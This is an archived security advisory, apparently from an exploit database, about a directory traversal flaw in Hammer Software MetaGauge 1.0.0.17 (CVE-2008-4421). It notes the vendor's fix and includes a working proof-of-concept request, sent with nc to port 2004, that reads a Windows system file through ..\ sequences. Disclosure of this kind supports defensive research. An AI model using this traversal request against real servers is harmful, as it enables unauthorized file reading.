Skip to content
cyberexploits
remotewindowstext

hammer software metagauge 1.0.0.17 - Directory Traversal

hammer software metagauge 1.0.0.17 - Directory Traversal

Published on 2008-10-06

Source code

Pinned to commit 7eac4c3a2ce5
textplatforms/windows/remote/6686.txt7eac4c3a
raw
Title: MetaGauge 1.0.0.17 Directory Traversal



-------------------------------------------------------------



Vendor: Hammer Software



Vendor URL: www.Hammer-Software.com



Vendor Response: Vendor has been notified and has since addressed the issue in the latest software release.



Description:



A directory traversal vulnerability exists in MetaGauge version 1.0.0.17 (and potentially below) which allows a remote user to view files local to the target server. 



Example:



C:\> nc targethost 2004

GET /..\..\..\..\..\..\winnt\win.ini HTTP/1.1





Patch Information:



Hammer has addressed the issue in the latest version of MetaGauge:



http://dl.hammer-software.com/metagauge.zip



CVE:  CVE-2008-4421



Credit:



Brad Antoniewicz



brad.antoniewicz@foundstone.com



# milw0rm.com [2008-10-06]

View on GitHub